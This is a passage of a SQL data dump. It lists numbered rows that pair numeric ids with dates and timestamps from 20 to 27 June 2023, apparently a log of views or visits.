12:24:13'),(78510,5163,1,'2023-06-20','2023-06-20 12:30:01'),(78511,1588,1,'2023-06-20','2023-06-20 12:43:31'),(78512,473,1,'2023-06-20','2023-06-20 12:46:28'),(78513,474,1,'2023-06-20','2023-06-20 12:46:28'),(78514,1728,1,'2023-06-20','2023-06-20 12:48:55'),(78515,1728,1,'2023-06-20','2023-06-20 12:49:35'),(78516,4648,1,'2023-06-20','2023-06-20 12:54:39'),(78517,4648,1,'2023-06-20','2023-06-20 12:54:40'),(78518,3714,1,'2023-06-20','2023-06-20 13:12:51'),(78519,4911,1,'2023-06-20','2023-06-20 13:16:18'),(78520,4963,1,'2023-06-20','2023-06-20 13:27:12'),(78521,4556,1,'2023-06-20','2023-06-20 13:27:40'),(78522,4874,1,'2023-06-20','2023-06-20 13:40:01'),(78523,5253,1,'2023-06-20','2023-06-20 13:46:34'),(78524,5157,1,'2023-06-20','2023-06-20 13:56:05'),(78525,4911,1,'2023-06-20','2023-06-20 15:43:22'),(78526,2904,1,'2023-06-20','2023-06-20 15:44:39'),(78527,2904,1,'2023-06-20','2023-06-20 15:44:42'),(78528,4911,1,'2023-06-20','2023-06-20 15:45:20'),(78529,4587,1,'2023-06-20','2023-06-20 16:26:27'),(78530,91,1,'2023-06-20','2023-06-20 19:06:31'),(78531,91,1,'2023-06-20','2023-06-20 19:53:15'),(78532,2410,1,'2023-06-20','2023-06-20 20:26:46'),(78533,4416,1,'2023-06-20','2023-06-20 21:21:03'),(78534,80,1,'2023-06-20','2023-06-20 21:31:54'),(78535,3297,1,'2023-06-20','2023-06-20 21:39:47'),(78536,5271,1,'2023-06-20','2023-06-20 21:43:14'),(78537,3297,1,'2023-06-20','2023-06-20 21:44:46'),(78538,2063,1,'2023-06-20','2023-06-20 22:00:35'),(78539,1602,1,'2023-06-20','2023-06-20 22:43:01'),(78540,4996,1,'2023-06-20','2023-06-20 22:43:55'),(78541,5157,1,'2023-06-20','2023-06-20 23:00:52'),(78542,4657,1,'2023-06-20','2023-06-20 23:50:04'),(78543,4996,1,'2023-06-20','2023-06-20 23:50:16'),(78544,3102,1,'2023-06-21','2023-06-21 01:05:41'),(78545,3482,1,'2023-06-21','2023-06-21 01:54:17'),(78546,2809,1,'2023-06-21','2023-06-21 02:47:20'),(78547,3297,1,'2023-06-21','2023-06-21 03:01:19'),(78548,4657,1,'2023-06-21','2023-06-21 03:01:20'),(78549,4408,1,'2023-06-21','2023-06-21 03:06:02'),(78550,468,1,'2023-06-21','2023-06-21 03:06:03'),(78551,1722,1,'2023-06-21','2023-06-21 03:06:04'),(78552,3781,1,'2023-06-21','2023-06-21 03:15:33'),(78553,4612,1,'2023-06-21','2023-06-21 03:33:16'),(78554,1730,1,'2023-06-21','2023-06-21 04:36:07'),(78555,3124,1,'2023-06-21','2023-06-21 06:21:57'),(78556,68,1,'2023-06-21','2023-06-21 06:31:46'),(78557,4944,1,'2023-06-21','2023-06-21 06:59:00'),(78558,4938,1,'2023-06-21','2023-06-21 08:46:18'),(78559,4911,1,'2023-06-21','2023-06-21 08:49:16'),(78560,3038,1,'2023-06-21','2023-06-21 09:08:15'),(78561,4911,1,'2023-06-21','2023-06-21 10:07:38'),(78562,5140,1,'2023-06-21','2023-06-21 10:38:33'),(78563,487,1,'2023-06-21','2023-06-21 10:51:13'),(78564,473,1,'2023-06-21','2023-06-21 10:51:14'),(78565,487,1,'2023-06-21','2023-06-21 11:09:07'),(78566,473,1,'2023-06-21','2023-06-21 11:09:07'),(78567,5140,1,'2023-06-21','2023-06-21 12:18:11'),(78568,4911,1,'2023-06-21','2023-06-21 12:38:02'),(78569,4911,1,'2023-06-21','2023-06-21 12:44:48'),(78570,5163,1,'2023-06-21','2023-06-21 12:51:26'),(78571,4911,1,'2023-06-21','2023-06-21 12:55:04'),(78572,91,1,'2023-06-21','2023-06-21 12:55:39'),(78573,4911,1,'2023-06-21','2023-06-21 13:16:40'),(78574,91,1,'2023-06-21','2023-06-21 13:42:02'),(78575,4938,1,'2023-06-21','2023-06-21 13:45:50'),(78576,4835,1,'2023-06-21','2023-06-21 13:49:01'),(78577,5353,1,'2023-06-21','2023-06-21 14:15:56'),(78578,4428,1,'2023-06-21','2023-06-21 14:17:07'),(78579,1600,1,'2023-06-21','2023-06-21 14:25:20'),(78580,5140,1,'2023-06-21','2023-06-21 14:31:55'),(78581,5356,1,'2023-06-21','2023-06-21 14:38:42'),(78582,5356,1,'2023-06-21','2023-06-21 14:38:45'),(78583,4753,1,'2023-06-21','2023-06-21 14:46:09'),(78584,4911,1,'2023-06-21','2023-06-21 15:00:04'),(78585,1774,1,'2023-06-21','2023-06-21 15:06:04'),(78586,5359,1,'2023-06-21','2023-06-21 15:23:40'),(78587,5359,1,'2023-06-21','2023-06-21 15:23:42'),(78588,4911,1,'2023-06-21','2023-06-21 15:31:16'),(78589,4835,1,'2023-06-21','2023-06-21 15:51:46'),(78590,1582,1,'2023-06-21','2023-06-21 15:55:22'),(78591,5033,1,'2023-06-21','2023-06-21 16:26:42'),(78592,1594,1,'2023-06-21','2023-06-21 16:58:29'),(78593,4966,1,'2023-06-21','2023-06-21 17:28:39'),(78594,3045,1,'2023-06-21','2023-06-21 17:45:53'),(78595,4963,1,'2023-06-21','2023-06-21 17:56:31'),(78596,1544,1,'2023-06-21','2023-06-21 18:06:58'),(78597,4963,1,'2023-06-21','2023-06-21 18:07:46'),(78598,3764,1,'2023-06-21','2023-06-21 18:19:00'),(78599,4960,1,'2023-06-21','2023-06-21 18:24:40'),(78600,5140,1,'2023-06-21','2023-06-21 18:26:58'),(78601,1582,1,'2023-06-21','2023-06-21 18:50:56'),(78602,5359,1,'2023-06-21','2023-06-21 19:05:01'),(78603,4911,1,'2023-06-21','2023-06-21 19:21:27'),(78604,5334,1,'2023-06-21','2023-06-21 19:56:23'),(78605,5323,1,'2023-06-21','2023-06-21 20:03:10'),(78606,5334,1,'2023-06-21','2023-06-21 20:07:05'),(78607,4966,1,'2023-06-21','2023-06-21 20:19:28'),(78608,4966,1,'2023-06-21','2023-06-21 20:19:55'),(78609,3023,1,'2023-06-21','2023-06-21 20:23:00'),(78610,4639,1,'2023-06-21','2023-06-21 20:49:49'),(78611,4759,1,'2023-06-21','2023-06-21 20:51:00'),(78612,4980,1,'2023-06-21','2023-06-21 21:04:23'),(78613,3038,1,'2023-06-21','2023-06-21 21:15:07'),(78614,5304,1,'2023-06-21','2023-06-21 22:04:28'),(78615,467,1,'2023-06-21','2023-06-21 22:20:50'),(78616,80,1,'2023-06-21','2023-06-21 22:25:37'),(78617,5289,1,'2023-06-21','2023-06-21 22:32:02'),(78618,5289,1,'2023-06-21','2023-06-21 23:17:05'),(78619,4706,1,'2023-06-21','2023-06-21 23:40:43'),(78620,2609,1,'2023-06-21','2023-06-21 23:42:01'),(78621,2309,1,'2023-06-22','2023-06-22 00:04:13'),(78622,1596,1,'2023-06-22','2023-06-22 01:09:14'),(78623,4911,1,'2023-06-22','2023-06-22 01:16:44'),(78624,3430,1,'2023-06-22','2023-06-22 01:46:41'),(78625,3313,1,'2023-06-22','2023-06-22 02:16:41'),(78626,3721,1,'2023-06-22','2023-06-22 02:22:11'),(78627,3764,1,'2023-06-22','2023-06-22 02:23:05'),(78628,3777,1,'2023-06-22','2023-06-22 02:29:09'),(78629,1596,1,'2023-06-22','2023-06-22 02:31:38'),(78630,1707,1,'2023-06-22','2023-06-22 02:35:40'),(78631,5125,1,'2023-06-22','2023-06-22 02:46:18'),(78632,4341,1,'2023-06-22','2023-06-22 02:57:26'),(78633,3251,1,'2023-06-22','2023-06-22 03:04:18'),(78634,3489,1,'2023-06-22','2023-06-22 03:41:13'),(78635,5276,1,'2023-06-22','2023-06-22 04:07:17'),(78636,4966,1,'2023-06-22','2023-06-22 04:33:32'),(78637,3038,1,'2023-06-22','2023-06-22 06:00:04'),(78638,5276,1,'2023-06-22','2023-06-22 07:37:30'),(78639,91,1,'2023-06-22','2023-06-22 07:58:31'),(78640,1774,1,'2023-06-22','2023-06-22 08:34:10'),(78641,4911,1,'2023-06-22','2023-06-22 09:04:58'),(78642,4966,1,'2023-06-22','2023-06-22 09:13:45'),(78643,4960,1,'2023-06-22','2023-06-22 09:42:47'),(78644,91,1,'2023-06-22','2023-06-22 09:43:04'),(78645,89,1,'2023-06-22','2023-06-22 09:43:22'),(78646,1582,1,'2023-06-22','2023-06-22 09:43:46'),(78647,89,1,'2023-06-22','2023-06-22 09:43:53'),(78648,1582,1,'2023-06-22','2023-06-22 09:43:56'),(78649,80,1,'2023-06-22','2023-06-22 09:44:22'),(78650,1582,1,'2023-06-22','2023-06-22 09:44:44'),(78651,89,1,'2023-06-22','2023-06-22 09:44:44'),(78652,91,1,'2023-06-22','2023-06-22 09:44:47'),(78653,4960,1,'2023-06-22','2023-06-22 09:44:50'),(78654,4657,1,'2023-06-22','2023-06-22 10:03:39'),(78655,1588,1,'2023-06-22','2023-06-22 10:13:35'),(78656,1588,1,'2023-06-22','2023-06-22 10:22:48'),(78657,4911,1,'2023-06-22','2023-06-22 10:32:33'),(78658,468,1,'2023-06-22','2023-06-22 10:48:22'),(78659,4485,1,'2023-06-22','2023-06-22 11:12:46'),(78660,3764,1,'2023-06-22','2023-06-22 11:33:44'),(78661,4938,1,'2023-06-22','2023-06-22 12:17:40'),(78662,4341,1,'2023-06-22','2023-06-22 12:44:40'),(78663,3489,1,'2023-06-22','2023-06-22 13:07:12'),(78664,4938,1,'2023-06-22','2023-06-22 13:18:25'),(78665,3060,1,'2023-06-22','2023-06-22 13:26:47'),(78666,4759,1,'2023-06-22','2023-06-22 13:26:47'),(78667,68,1,'2023-06-22','2023-06-22 13:28:07'),(78668,4911,1,'2023-06-22','2023-06-22 13:45:43'),(78669,1544,1,'2023-06-22','2023-06-22 13:48:12'),(78670,1722,1,'2023-06-22','2023-06-22 13:49:38'),(78671,4911,1,'2023-06-22','2023-06-22 13:50:19'),(78672,3313,1,'2023-06-22','2023-06-22 14:05:14'),(78673,4660,1,'2023-06-22','2023-06-22 14:07:09'),(78674,2395,1,'2023-06-22','2023-06-22 14:10:23'),(78675,4911,1,'2023-06-22','2023-06-22 14:11:23'),(78676,1592,1,'2023-06-22','2023-06-22 14:19:06'),(78677,3034,1,'2023-06-22','2023-06-22 14:23:10'),(78678,3034,1,'2023-06-22','2023-06-22 14:41:11'),(78679,570,1,'2023-06-22','2023-06-22 14:43:23'),(78680,570,1,'2023-06-22','2023-06-22 14:43:32'),(78681,1544,1,'2023-06-22','2023-06-22 15:24:28'),(78682,3498,1,'2023-06-22','2023-06-22 15:42:24'),(78683,4660,1,'2023-06-22','2023-06-22 16:04:13'),(78684,3038,1,'2023-06-22','2023-06-22 16:25:42'),(78685,4802,1,'2023-06-22','2023-06-22 16:50:33'),(78686,4344,1,'2023-06-22','2023-06-22 16:59:46'),(78687,4911,1,'2023-06-22','2023-06-22 17:13:52'),(78688,4960,1,'2023-06-22','2023-06-22 17:24:15'),(78689,80,1,'2023-06-22','2023-06-22 17:25:16'),(78690,4960,1,'2023-06-22','2023-06-22 17:26:33'),(78691,76,1,'2023-06-22','2023-06-22 17:32:11'),(78692,89,1,'2023-06-22','2023-06-22 17:32:56'),(78693,4930,1,'2023-06-22','2023-06-22 17:33:13'),(78694,4960,1,'2023-06-22','2023-06-22 17:33:36'),(78695,1608,1,'2023-06-22','2023-06-22 17:45:22'),(78696,3087,1,'2023-06-22','2023-06-22 18:02:13'),(78697,91,1,'2023-06-22','2023-06-22 18:12:35'),(78698,4963,1,'2023-06-22','2023-06-22 18:56:21'),(78699,3102,1,'2023-06-22','2023-06-22 19:22:09'),(78700,1588,1,'2023-06-22','2023-06-22 19:59:57'),(78701,5163,1,'2023-06-22','2023-06-22 20:16:45'),(78702,4966,1,'2023-06-22','2023-06-22 21:14:07'),(78703,2395,1,'2023-06-22','2023-06-22 21:56:14'),(78704,5268,1,'2023-06-22','2023-06-22 22:21:59'),(78705,2989,1,'2023-06-22','2023-06-22 22:48:58'),(78706,2911,1,'2023-06-23','2023-06-23 00:03:43'),(78707,2911,1,'2023-06-23','2023-06-23 00:04:22'),(78708,5359,1,'2023-06-23','2023-06-23 00:15:26'),(78709,3055,1,'2023-06-23','2023-06-23 01:50:28'),(78710,4520,1,'2023-06-23','2023-06-23 01:50:31'),(78711,1588,1,'2023-06-23','2023-06-23 01:59:57'),(78712,1598,1,'2023-06-23','2023-06-23 02:04:46'),(78713,3290,1,'2023-06-23','2023-06-23 02:14:11'),(78714,1602,1,'2023-06-23','2023-06-23 02:22:14'),(78715,1588,1,'2023-06-23','2023-06-23 02:31:41'),(78716,5268,1,'2023-06-23','2023-06-23 03:00:09'),(78717,3038,1,'2023-06-23','2023-06-23 03:19:57'),(78718,1602,1,'2023-06-23','2023-06-23 03:30:10'),(78719,1588,1,'2023-06-23','2023-06-23 03:50:10'),(78720,1602,1,'2023-06-23','2023-06-23 04:00:08'),(78721,5356,1,'2023-06-23','2023-06-23 04:20:08'),(78722,3790,1,'2023-06-23','2023-06-23 04:35:13'),(78723,1707,1,'2023-06-23','2023-06-23 04:40:16'),(78724,3764,1,'2023-06-23','2023-06-23 04:50:09'),(78725,91,1,'2023-06-23','2023-06-23 05:48:48'),(78726,4930,1,'2023-06-23','2023-06-23 06:14:36'),(78727,3090,1,'2023-06-23','2023-06-23 06:20:38'),(78728,1772,1,'2023-06-23','2023-06-23 06:59:46'),(78729,1602,1,'2023-06-23','2023-06-23 07:10:52'),(78730,4457,1,'2023-06-23','2023-06-23 08:16:30'),(78731,4802,1,'2023-06-23','2023-06-23 08:22:22'),(78732,80,1,'2023-06-23','2023-06-23 09:37:11'),(78733,4529,1,'2023-06-23','2023-06-23 09:43:45'),(78734,91,1,'2023-06-23','2023-06-23 10:27:49'),(78735,1544,1,'2023-06-23','2023-06-23 10:36:35'),(78736,5292,1,'2023-06-23','2023-06-23 10:55:06'),(78737,1582,1,'2023-06-23','2023-06-23 11:25:38'),(78738,91,1,'2023-06-23','2023-06-23 11:26:31'),(78739,4911,1,'2023-06-23','2023-06-23 11:38:50'),(78740,2904,1,'2023-06-23','2023-06-23 11:39:16'),(78741,2904,1,'2023-06-23','2023-06-23 11:40:55'),(78742,4911,1,'2023-06-23','2023-06-23 11:40:59'),(78743,4412,1,'2023-06-23','2023-06-23 11:57:02'),(78744,3430,1,'2023-06-23','2023-06-23 12:04:08'),(78745,5280,1,'2023-06-23','2023-06-23 12:42:44'),(78746,5067,1,'2023-06-23','2023-06-23 13:44:04'),(78747,4911,1,'2023-06-23','2023-06-23 14:03:48'),(78748,4911,1,'2023-06-23','2023-06-23 14:11:04'),(78749,5062,1,'2023-06-23','2023-06-23 14:16:31'),(78750,2911,1,'2023-06-23','2023-06-23 14:26:12'),(78751,473,1,'2023-06-23','2023-06-23 14:53:21'),(78752,1870,1,'2023-06-23','2023-06-23 14:53:21'),(78753,3764,1,'2023-06-23','2023-06-23 14:55:39'),(78754,4654,1,'2023-06-23','2023-06-23 15:35:45'),(78755,4654,1,'2023-06-23','2023-06-23 15:36:25'),(78756,5080,1,'2023-06-23','2023-06-23 15:53:04'),(78757,3285,1,'2023-06-23','2023-06-23 15:57:36'),(78758,1707,1,'2023-06-23','2023-06-23 16:13:22'),(78759,473,1,'2023-06-23','2023-06-23 16:59:51'),(78760,1872,1,'2023-06-23','2023-06-23 16:59:56'),(78761,4911,1,'2023-06-23','2023-06-23 17:03:09'),(78762,76,1,'2023-06-23','2023-06-23 17:03:57'),(78763,4911,1,'2023-06-23','2023-06-23 17:04:31'),(78764,1877,1,'2023-06-23','2023-06-23 17:06:00'),(78765,473,1,'2023-06-23','2023-06-23 17:06:00'),(78766,4436,1,'2023-06-23','2023-06-23 17:12:46'),(78767,4762,1,'2023-06-23','2023-06-23 17:35:59'),(78768,3004,1,'2023-06-23','2023-06-23 18:49:26'),(78769,1724,1,'2023-06-23','2023-06-23 19:06:13'),(78770,89,1,'2023-06-23','2023-06-23 19:17:26'),(78771,3710,1,'2023-06-23','2023-06-23 19:20:38'),(78772,3251,1,'2023-06-23','2023-06-23 19:25:51'),(78773,3710,1,'2023-06-23','2023-06-23 19:38:39'),(78774,3102,1,'2023-06-23','2023-06-23 19:43:25'),(78775,91,1,'2023-06-23','2023-06-23 20:57:13'),(78776,4363,1,'2023-06-23','2023-06-23 21:50:08'),(78777,1600,1,'2023-06-23','2023-06-23 22:22:14'),(78778,4911,1,'2023-06-23','2023-06-23 23:08:24'),(78779,5280,1,'2023-06-23','2023-06-23 23:31:56'),(78780,4440,1,'2023-06-24','2023-06-24 01:01:57'),(78781,4911,1,'2023-06-24','2023-06-24 01:16:50'),(78782,74,1,'2023-06-24','2023-06-24 01:17:17'),(78783,4911,1,'2023-06-24','2023-06-24 01:17:22'),(78784,1768,1,'2023-06-24','2023-06-24 01:43:42'),(78785,4344,1,'2023-06-24','2023-06-24 01:43:50'),(78786,1586,1,'2023-06-24','2023-06-24 02:12:23'),(78787,4344,1,'2023-06-24','2023-06-24 02:16:43'),(78788,68,1,'2023-06-24','2023-06-24 02:17:48'),(78789,1586,1,'2023-06-24','2023-06-24 02:17:57'),(78790,1768,1,'2023-06-24','2023-06-24 02:28:43'),(78791,4911,1,'2023-06-24','2023-06-24 02:59:13'),(78792,2769,1,'2023-06-24','2023-06-24 03:09:14'),(78793,4966,1,'2023-06-24','2023-06-24 03:27:10'),(78794,4657,1,'2023-06-24','2023-06-24 03:49:40'),(78795,4524,1,'2023-06-24','2023-06-24 04:34:43'),(78796,4436,1,'2023-06-24','2023-06-24 06:02:52'),(78797,3498,1,'2023-06-24','2023-06-24 06:40:01'),(78798,68,1,'2023-06-24','2023-06-24 06:53:39'),(78799,4341,1,'2023-06-24','2023-06-24 07:01:37'),(78800,4520,1,'2023-06-24','2023-06-24 07:09:54'),(78801,3290,1,'2023-06-24','2023-06-24 08:40:20'),(78802,2964,1,'2023-06-24','2023-06-24 09:17:43'),(78803,5356,1,'2023-06-24','2023-06-24 10:09:46'),(78804,4960,1,'2023-06-24','2023-06-24 10:28:02'),(78805,3006,1,'2023-06-24','2023-06-24 10:36:17'),(78806,4911,1,'2023-06-24','2023-06-24 11:36:46'),(78807,4911,1,'2023-06-24','2023-06-24 11:50:35'),(78808,80,1,'2023-06-24','2023-06-24 11:51:43'),(78809,4911,1,'2023-06-24','2023-06-24 11:52:35'),(78810,3079,1,'2023-06-24','2023-06-24 12:01:14'),(78811,4960,1,'2023-06-24','2023-06-24 13:50:48'),(78812,5128,1,'2023-06-24','2023-06-24 13:58:04'),(78813,4950,1,'2023-06-24','2023-06-24 14:58:27'),(78814,4950,1,'2023-06-24','2023-06-24 15:00:00'),(78815,1544,1,'2023-06-24','2023-06-24 15:20:44'),(78816,3079,1,'2023-06-24','2023-06-24 15:45:07'),(78817,4966,1,'2023-06-24','2023-06-24 16:45:03'),(78818,3790,1,'2023-06-24','2023-06-24 17:19:05'),(78819,3731,1,'2023-06-24','2023-06-24 17:44:57'),(78820,91,1,'2023-06-24','2023-06-24 17:52:27'),(78821,4424,1,'2023-06-24','2023-06-24 18:24:18'),(78822,3290,1,'2023-06-24','2023-06-24 18:27:02'),(78823,2809,1,'2023-06-24','2023-06-24 18:29:46'),(78824,1600,1,'2023-06-24','2023-06-24 19:18:03'),(78825,3691,1,'2023-06-24','2023-06-24 19:36:03'),(78826,3691,1,'2023-06-24','2023-06-24 20:27:19'),(78827,1728,1,'2023-06-24','2023-06-24 21:26:58'),(78828,4966,1,'2023-06-24','2023-06-24 22:25:32'),(78829,1722,1,'2023-06-24','2023-06-24 23:19:35'),(78830,3038,1,'2023-06-24','2023-06-24 23:21:59'),(78831,4911,1,'2023-06-24','2023-06-24 23:31:24'),(78832,5033,1,'2023-06-25','2023-06-25 00:36:20'),(78833,4950,1,'2023-06-25','2023-06-25 00:45:55'),(78834,3777,1,'2023-06-25','2023-06-25 01:44:19'),(78835,5280,1,'2023-06-25','2023-06-25 01:44:20'),(78836,4412,1,'2023-06-25','2023-06-25 01:47:06'),(78837,3777,1,'2023-06-25','2023-06-25 01:48:50'),(78838,2309,1,'2023-06-25','2023-06-25 01:52:15'),(78839,4963,1,'2023-06-25','2023-06-25 01:56:48'),(78840,5080,1,'2023-06-25','2023-06-25 02:03:09'),(78841,4966,1,'2023-06-25','2023-06-25 02:12:12'),(78842,4524,1,'2023-06-25','2023-06-25 02:21:10'),(78843,4520,1,'2023-06-25','2023-06-25 02:29:20'),(78844,3038,1,'2023-06-25','2023-06-25 02:32:47'),(78845,4657,1,'2023-06-25','2023-06-25 02:39:12'),(78846,3498,1,'2023-06-25','2023-06-25 02:48:50'),(78847,4963,1,'2023-06-25','2023-06-25 03:11:47'),(78848,5080,1,'2023-06-25','2023-06-25 03:26:47'),(78849,1705,1,'2023-06-25','2023-06-25 03:28:17'),(78850,1709,1,'2023-06-25','2023-06-25 03:35:49'),(78851,5080,1,'2023-06-25','2023-06-25 03:41:47'),(78852,3664,1,'2023-06-25','2023-06-25 03:46:49'),(78853,3285,1,'2023-06-25','2023-06-25 03:47:38'),(78854,4950,1,'2023-06-25','2023-06-25 03:54:39'),(78855,1544,1,'2023-06-25','2023-06-25 04:00:31'),(78856,4950,1,'2023-06-25','2023-06-25 04:07:40'),(78857,5356,1,'2023-06-25','2023-06-25 04:33:12'),(78858,3764,1,'2023-06-25','2023-06-25 04:38:28'),(78859,1705,1,'2023-06-25','2023-06-25 04:39:15'),(78860,3764,1,'2023-06-25','2023-06-25 05:24:04'),(78861,2309,1,'2023-06-25','2023-06-25 05:31:04'),(78862,2309,1,'2023-06-25','2023-06-25 05:59:26'),(78863,4587,1,'2023-06-25','2023-06-25 06:20:48'),(78864,3731,1,'2023-06-25','2023-06-25 07:13:05'),(78865,4363,1,'2023-06-25','2023-06-25 07:15:08'),(78866,4911,1,'2023-06-25','2023-06-25 07:23:04'),(78867,4930,1,'2023-06-25','2023-06-25 08:43:13'),(78868,91,1,'2023-06-25','2023-06-25 09:02:19'),(78869,89,1,'2023-06-25','2023-06-25 09:03:04'),(78870,3102,1,'2023-06-25','2023-06-25 09:46:55'),(78871,3664,1,'2023-06-25','2023-06-25 10:55:54'),(78872,80,1,'2023-06-25','2023-06-25 11:16:05'),(78873,4911,1,'2023-06-25','2023-06-25 11:42:05'),(78874,4529,1,'2023-06-25','2023-06-25 11:55:27'),(78875,2309,1,'2023-06-25','2023-06-25 11:59:51'),(78876,1772,1,'2023-06-25','2023-06-25 12:34:52'),(78877,1600,1,'2023-06-25','2023-06-25 13:19:54'),(78878,5253,1,'2023-06-25','2023-06-25 13:21:13'),(78879,5253,1,'2023-06-25','2023-06-25 13:21:36'),(78880,5253,1,'2023-06-25','2023-06-25 13:21:54'),(78881,4911,1,'2023-06-25','2023-06-25 13:22:50'),(78882,4966,1,'2023-06-25','2023-06-25 13:47:29'),(78883,4529,1,'2023-06-25','2023-06-25 13:50:58'),(78884,89,1,'2023-06-25','2023-06-25 14:17:05'),(78885,4960,1,'2023-06-25','2023-06-25 14:40:57'),(78886,4524,1,'2023-06-25','2023-06-25 14:42:04'),(78887,5289,1,'2023-06-25','2023-06-25 14:43:06'),(78888,4911,1,'2023-06-25','2023-06-25 15:00:46'),(78889,76,1,'2023-06-25','2023-06-25 15:09:48'),(78890,4911,1,'2023-06-25','2023-06-25 15:13:16'),(78891,4657,1,'2023-06-25','2023-06-25 15:17:57'),(78892,1606,1,'2023-06-25','2023-06-25 15:18:53'),(78893,5116,1,'2023-06-25','2023-06-25 15:19:52'),(78894,3109,1,'2023-06-25','2023-06-25 15:45:53'),(78895,4357,1,'2023-06-25','2023-06-25 15:49:38'),(78896,2420,1,'2023-06-25','2023-06-25 15:53:24'),(78897,1741,1,'2023-06-25','2023-06-25 16:02:49'),(78898,1741,1,'2023-06-25','2023-06-25 16:08:30'),(78899,5280,1,'2023-06-25','2023-06-25 16:09:36'),(78900,4357,1,'2023-06-25','2023-06-25 16:20:16'),(78901,2813,1,'2023-06-25','2023-06-25 16:22:42'),(78902,4520,1,'2023-06-25','2023-06-25 17:12:22'),(78903,4960,1,'2023-06-25','2023-06-25 17:34:53'),(78904,4412,1,'2023-06-25','2023-06-25 17:45:52'),(78905,4765,1,'2023-06-25','2023-06-25 17:47:57'),(78906,5280,1,'2023-06-25','2023-06-25 17:57:20'),(78907,5323,1,'2023-06-25','2023-06-25 18:28:16'),(78908,4391,1,'2023-06-25','2023-06-25 19:11:34'),(78909,1602,1,'2023-06-25','2023-06-25 19:25:20'),(78910,1602,1,'2023-06-25','2023-06-25 19:25:46'),(78911,1612,1,'2023-06-25','2023-06-25 20:12:22'),(78912,5062,1,'2023-06-25','2023-06-25 20:51:30'),(78913,1610,1,'2023-06-25','2023-06-25 21:39:55'),(78914,3038,1,'2023-06-25','2023-06-25 22:09:47'),(78915,1588,1,'2023-06-25','2023-06-25 22:25:10'),(78916,5033,1,'2023-06-25','2023-06-25 22:38:58'),(78917,3263,1,'2023-06-25','2023-06-25 23:28:00'),(78918,3764,1,'2023-06-26','2023-06-26 00:02:09'),(78919,5163,1,'2023-06-26','2023-06-26 01:04:21'),(78920,3102,1,'2023-06-26','2023-06-26 02:05:24'),(78921,5292,1,'2023-06-26','2023-06-26 02:27:52'),(78922,5298,1,'2023-06-26','2023-06-26 02:49:35'),(78923,5314,1,'2023-06-26','2023-06-26 03:10:11'),(78924,1718,1,'2023-06-26','2023-06-26 03:14:43'),(78925,5295,1,'2023-06-26','2023-06-26 03:47:46'),(78926,76,1,'2023-06-26','2023-06-26 04:38:44'),(78927,1604,1,'2023-06-26','2023-06-26 05:08:36'),(78928,2609,1,'2023-06-26','2023-06-26 06:26:12'),(78929,3691,1,'2023-06-26','2023-06-26 06:36:26'),(78930,1600,1,'2023-06-26','2023-06-26 07:16:15'),(78931,4911,1,'2023-06-26','2023-06-26 07:16:41'),(78932,4911,1,'2023-06-26','2023-06-26 07:18:09'),(78933,4960,1,'2023-06-26','2023-06-26 07:30:55'),(78934,5323,1,'2023-06-26','2023-06-26 07:55:39'),(78935,1544,1,'2023-06-26','2023-06-26 08:26:41'),(78936,4911,1,'2023-06-26','2023-06-26 08:34:45'),(78937,2297,1,'2023-06-26','2023-06-26 08:42:44'),(78938,4412,1,'2023-06-26','2023-06-26 08:55:54'),(78939,5163,1,'2023-06-26','2023-06-26 09:16:37'),(78940,5163,1,'2023-06-26','2023-06-26 09:18:08'),(78941,4944,1,'2023-06-26','2023-06-26 09:18:46'),(78942,4911,1,'2023-06-26','2023-06-26 10:03:07'),(78943,2751,1,'2023-06-26','2023-06-26 10:07:36'),(78944,4238,1,'2023-06-26','2023-06-26 10:10:28'),(78945,473,1,'2023-06-26','2023-06-26 10:19:10'),(78946,487,1,'2023-06-26','2023-06-26 10:19:10'),(78947,1598,1,'2023-06-26','2023-06-26 10:40:30'),(78948,4911,1,'2023-06-26','2023-06-26 10:43:56'),(78949,84,1,'2023-06-26','2023-06-26 11:19:58'),(78950,1718,1,'2023-06-26','2023-06-26 12:21:42'),(78951,1718,1,'2023-06-26','2023-06-26 12:51:18'),(78952,4556,1,'2023-06-26','2023-06-26 13:26:04'),(78953,5295,1,'2023-06-26','2023-06-26 13:38:30'),(78954,4436,1,'2023-06-26','2023-06-26 13:43:31'),(78955,72,1,'2023-06-26','2023-06-26 13:47:59'),(78956,76,1,'2023-06-26','2023-06-26 13:52:57'),(78957,106,1,'2023-06-26','2023-06-26 13:53:45'),(78958,4685,1,'2023-06-26','2023-06-26 13:56:05'),(78959,4703,1,'2023-06-26','2023-06-26 14:01:10'),(78960,5323,1,'2023-06-26','2023-06-26 14:06:39'),(78961,72,1,'2023-06-26','2023-06-26 14:19:10'),(78962,3498,1,'2023-06-26','2023-06-26 14:21:27'),(78963,4694,1,'2023-06-26','2023-06-26 14:35:51'),(78964,3771,1,'2023-06-26','2023-06-26 15:02:42'),(78965,4966,1,'2023-06-26','2023-06-26 15:13:10'),(78966,87,1,'2023-06-26','2023-06-26 15:15:07'),(78967,4966,1,'2023-06-26','2023-06-26 15:16:10'),(78968,1544,1,'2023-06-26','2023-06-26 15:20:48'),(78969,1718,1,'2023-06-26','2023-06-26 15:25:01'),(78970,1588,1,'2023-06-26','2023-06-26 16:04:56'),(78971,4238,1,'2023-06-26','2023-06-26 16:27:40'),(78972,4674,1,'2023-06-26','2023-06-26 16:48:11'),(78973,1612,1,'2023-06-26','2023-06-26 17:28:01'),(78974,4688,1,'2023-06-26','2023-06-26 17:31:24'),(78975,84,1,'2023-06-26','2023-06-26 17:53:02'),(78976,1766,1,'2023-06-26','2023-06-26 18:06:06'),(78977,80,1,'2023-06-26','2023-06-26 18:37:36'),(78978,3004,1,'2023-06-26','2023-06-26 18:51:41'),(78979,1594,1,'2023-06-26','2023-06-26 19:00:42'),(78980,1612,1,'2023-06-26','2023-06-26 19:47:44'),(78981,1612,1,'2023-06-26','2023-06-26 19:49:13'),(78982,91,1,'2023-06-26','2023-06-26 19:51:20'),(78983,4930,1,'2023-06-26','2023-06-26 19:57:51'),(78984,4911,1,'2023-06-26','2023-06-26 19:58:55'),(78985,84,1,'2023-06-26','2023-06-26 19:59:48'),(78986,4911,1,'2023-06-26','2023-06-26 20:02:08'),(78987,4930,1,'2023-06-26','2023-06-26 20:02:08'),(78988,91,1,'2023-06-26','2023-06-26 20:02:10'),(78989,1612,1,'2023-06-26','2023-06-26 20:02:12'),(78990,2964,1,'2023-06-26','2023-06-26 20:47:16'),(78991,5163,1,'2023-06-26','2023-06-26 21:48:35'),(78992,4911,1,'2023-06-26','2023-06-26 22:33:42'),(78993,4448,1,'2023-06-26','2023-06-26 22:43:03'),(78994,3278,1,'2023-06-27','2023-06-27 